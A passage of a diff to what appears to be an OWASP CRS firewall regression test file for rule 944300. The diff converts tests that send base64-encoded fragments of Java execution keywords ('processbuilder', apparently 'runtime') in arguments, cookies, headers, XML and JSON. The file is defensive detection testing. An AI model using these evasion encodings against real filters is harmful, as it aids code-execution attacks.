Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log: + expect_ids: [944300] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log: + expect_ids: [944300] + - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-26 
+ - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 31 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log: + expect_ids: [944300] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: 
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "cHJvY2Vzc2J1aWxkZXI=test"
- output:
- log_contains: "id \"944300\""
- - test_title: 944300-36
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "cHJvY2Vzc2J1aWxkZXI=test"
+ output:
+ log:
+ expect_ids: [944300]
+ - test_id: 36
 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=cHJvY2Vzc2J1aWxkZXI
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944300\""
- - test_title: 944300-37
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=cHJvY2Vzc2J1aWxkZXI
+ method: "POST"
+ uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "cHJvY2Vzc2J1aWxkZXI"
+ output:
+ log:
+ expect_ids: [944300]
+ - test_id: 41
 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "cHJvY2Vzc2J1aWxkZXI"
- output:
- log_contains: "id \"944300\""
- - test_title: 944300-42
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "cHJvY2Vzc2J1aWxkZXI"
+ output:
+ log:
+ expect_ids: [944300]
+ - test_id: 42
 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=cHJvY2Vzc2J1aWxkZXI"
- output:
- log_contains: "id
\"944300\"" - - test_title: 944300-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log: + expect_ids: [944300] + - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 48 desc: "Cookie name includes 
